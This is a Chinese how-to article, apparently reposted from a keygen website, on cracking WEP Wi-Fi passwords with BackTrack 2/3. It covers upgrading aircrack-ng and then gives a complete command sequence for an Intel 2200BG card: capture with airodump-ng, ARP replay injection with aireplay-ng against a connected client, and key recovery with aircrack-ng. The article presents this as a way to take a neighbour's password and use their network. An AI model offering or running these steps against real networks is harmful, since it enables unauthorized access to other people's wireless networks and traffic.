BT3破解无客户端wep图文技巧

另外，假如你用的是BT2系统，方法一样，但要对系统中的Aircrack进行升级。因破解环境往往无法在线升级bt2，故先将aircrack-ng-0.9.1.tar.gz 下载到本地硬盘，我是放在c盘的根目录下。 本文来自注册机之家

   用usb bt2 系统启动bt2，进入界面后，打开一个窗口，

   输入cd /mnt

   输入再输入 ls

   这样你就能看到你的硬盘名 一般是sda1 hda1 或hdc1（我的就是hda1）

   再输入

   cd /mnt/hda1 或者cd /mnt/hdc1, 就是进入你的c盘根目录。

   再输入 本文来自注册机之家

   tar -xf aircrack-ng-0.9.1.tar.gz

   再输入

   cd aircrack-ng-0.9.1    再输入

   make clean && make && make install      这样，你就可以直接在新版本下破解了，方法同上。 本文来自注册机之家

···································································

英特尔2200BG网卡破解方法

刚刚用了不到5分钟在BT3下用2200破解了一个wep，写一下具体的方法，我想2200的卡还是非常普及的，有兴趣的可以去试试看。

本文来自注册机之家

在BT2下一直找不到2200的卡，昨天下了BT3，今天也是抱着试试看的心情，最后在试一把，不行就买LINKSYS WUSB54G，因为在国外的网站上专门有一篇介绍2200破解的，方法和一般的不一样，具体原理可参考 http://tinyshell.be/aircrackng/forum/index.php?topic=1775.0 对于像我这种菜鸟来说这种文章是再适合不过的了。

把全部完整的命令写一下，可以参考下，

1;打开窗口，输入

rmmod ipw2200

modprobe ipw2200 rtap_iface=1

2; 本文来自注册机之家

iwconfig eth1 ap <AP MAC>
iwconfig eth1 key s:fakekey
iwconfig eth1 mode managed

3;
ifconfig eth1 up
ifconfig rtap0 up

4;

airodump-ng --channel <Access Point channel> --bssid <AP MAC> -w dumpfile rtap0

本文来自注册机之家

这时你观察station下面是不是有对方的机器，如果客户端有在上网，那么station下面就会有对方的MAC,记下来。

5; 打开新的窗口，输入

aireplay-ng --arpreplay -b <AP MAC> -h <客户机的 MAC> -i rtap0 eth1

此时如果对方有客户端在上网，那么DATA的数据会增加，我刚才的情况是有客户端，但是RXQ信号很弱，差不多只有13左右，10分钟才增加了300个date，不过10分钟后RXQ超过50，接着DATA极速增加，此时在第5步打开的窗口中，ARP得到的数据也会同时增加。

6； 当DATA超过100000后，打开新的窗口，输入

aircrack-ng -z -b <AP MAC> dumpfile*.cap

然后就大功告成，抄下密码，上网去吧，嘿嘿。

上面就是BT3光盘启动下，最简单的破解有客户端WEP的全部过程，如果信号好的话，估计也就10来分钟搞定。

Ps；上面命令中的< >是不需要的。

最后看看我的信号，不是一般的低，不过蹭蹭网绰绰有余了，呵呵。

看完这篇新闻有何感觉